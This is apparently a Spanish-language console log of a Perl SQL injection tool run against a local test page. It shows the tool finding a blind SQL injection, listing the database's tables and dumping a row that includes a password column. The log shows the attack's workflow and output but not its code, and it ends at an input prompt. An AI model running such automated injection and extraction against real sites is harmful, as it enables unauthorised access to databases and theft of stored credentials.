C:\Users\Javi\Desktop\Under\Scripts>SQLiny.pl http://127.0.0.1/test/SQLi/?id=1 -b [/\/\/] | Perl SQL Inyector v1.5 <----> By Ca0s {Alias sh0k!} | [\/\/\] ----------------------------------------------------------------------- Gr33tz: | #RemoteExecution | DiosDeLaRed | EvilZone | { st4ck-3rr0r.blogspot.com } [+] Objetivo: http://127.0.0.1/test/SQLi/?id=1 [+] Probando inyeccion a ciegas... mas vale que te sobre el tiempo [+] El objetivo es vulnerable ;-) [+] Extrayendo algunos datos... --Version SQL: 5.1.41 --Database:test [+] Extrayendo tablas del information_schema: --Numero de tablas: 70 [/] Intruduce un numero de tabla (0-69) para extraer sus datos (ALL para extraer los nombres de todas todas - mucha paciencia) -> 69 -- Tabla: sqli --Pertenece a la DB: test --Numero de columnas: 3 --Rows: 2 [/] Extraer columnas? (S/N) s --nombre --id --pass [/] Extraer fila? (S/N) s [-] Fila: 1/2 [nombre] ca0s [id] 1 [pass] test [/] Extraer fila? (S/N) n [/] Extraer otra tabla? (S/N) s [/] Intruduce un numero de tabla (0-69) para extraer sus datos (ALL para extraer los nombres de todas todas - mucha paciencia) -> a 0 --CHARACTER_SETS 1 --COOLLATIOONS 2 --COOLLATIOON_CHARACTER_SET_APPLICABILITY 3 --COOLUMNS 4 --COOLUMN_PRIVILEGES 5 --ENGINES 6 --EVENTS 7 --FILES 8 --GLOOBAL_STATUS 9 --GLOOBAL_VARIABLES 10 --KEY_COOLUMN_USAGE 11 --PARTITIOONS 12 --PLUGINS 13 --PROOCESSLIST 14 --PROOFILING 15 --REFERENTIAL_COONSTRAINTS 16 --ROOUTINES 17 --SCHEMATA 18 --SCHEMA_PRIVILEGES 19 --SESSIOON_STATUS 20 --SESSIOON_VARIABLES 21 --STATISTICS 22 --TABLES 23 --TABLE_COONSTRAINTS 24 --TABLE_PRIVILEGES 25 --TRIGGERS 26 --USER_PRIVILEGES 27 --VIEWS 28 --bots 29 --logs 30 --usuarios 31 --varios 32 --cds 33 --comentariosblog 34 --entradasblog 35 --frases 36 --imagenes 37 --usuarios 38 --columns_priv 39 --db 40 --event 41 --func 42 --general_log 43 --help_category 44 --help_keyword 45 --help_relation 46 --help_topic 47 --host 48 --ndb_binlog_index 49 --plugin 50 --proc 51 --procs_priv 52 --servers 53 --slow_log 54 --tables_priv 55 --time_zone 56 --time_zone_leap_second 57 --time_zone_name 58 --time_zone_transition 59 --time_zone_transition_type 60 --user 61 --pma_bookmark 62 --pma_column_info 63 --pma_designer_coords 64 --pma_history 65 --pma_pdf_pages 66 --pma_relation 67 --pma_table_coords 68 --pma_table_info 69 --sqli [/] Intruduce un numero de tabla (0-69) para extraer sus datos -> 35 -- Tabla: frases --Pertenece a la DB: miweb --Numero de columnas: 2 --Rows: 1 [/] Extraer columnas? (S/N) n [/] Extraer otra tabla? (S/N) s 0 -- CHARACTER_SETS 1 -- COOLLATIOONS 2 -- COOLLATIOON_CHARACTER_SET_APPLICABILITY 3 -- COOLUMNS 4 -- COOLUMN_PRIVILEGES 5 -- ENGINES 6 -- EVENTS 7 -- FILES 8 -- GLOOBAL_STATUS 9 -- GLOOBAL_VARIABLES 10 -- KEY_COOLUMN_USAGE 11 -- PARTITIOONS 12 -- PLUGINS 13 -- PROOCESSLIST 14 -- PROOFILING 15 -- REFERENTIAL_COONSTRAINTS 16 -- ROOUTINES 17 -- SCHEMATA 18 -- SCHEMA_PRIVILEGES 19 -- SESSIOON_STATUS 20 -- SESSIOON_VARIABLES 21 -- STATISTICS 22 -- TABLES 23 -- TABLE_COONSTRAINTS 24 -- TABLE_PRIVILEGES 25 -- TRIGGERS 26 -- USER_PRIVILEGES 27 -- VIEWS 28 -- bots 29 -- logs 30 -- usuarios 31 -- varios 32 -- cds 33 -- comentariosblog 34 -- entradasblog 35 -- frases 36 -- imagenes 37 -- usuarios 38 -- columns_priv 39 -- db 40 -- event 41 -- func 42 -- general_log 43 -- help_category 44 -- help_keyword 45 -- help_relation 46 -- help_topic 47 -- host 48 -- ndb_binlog_index 49 -- plugin 50 -- proc 51 -- procs_priv 52 -- servers 53 -- slow_log 54 -- tables_priv 55 -- time_zone 56 -- time_zone_leap_second 57 -- time_zone_name 58 -- time_zone_transition 59 -- time_zone_transition_type 60 -- user 61 -- pma_bookmark 62 -- pma_column_info 63 -- pma_designer_coords 64 -- pma_history 65 -- pma_pdf_pages 66 -- pma_relation 67 -- pma_table_coords 68 -- pma_table_info 69 -- sqli [/] Intruduce un numero de tabla (0-69) para extraer sus datos (ALL para extraer los nombres de todas todas - mucha paciencia) ->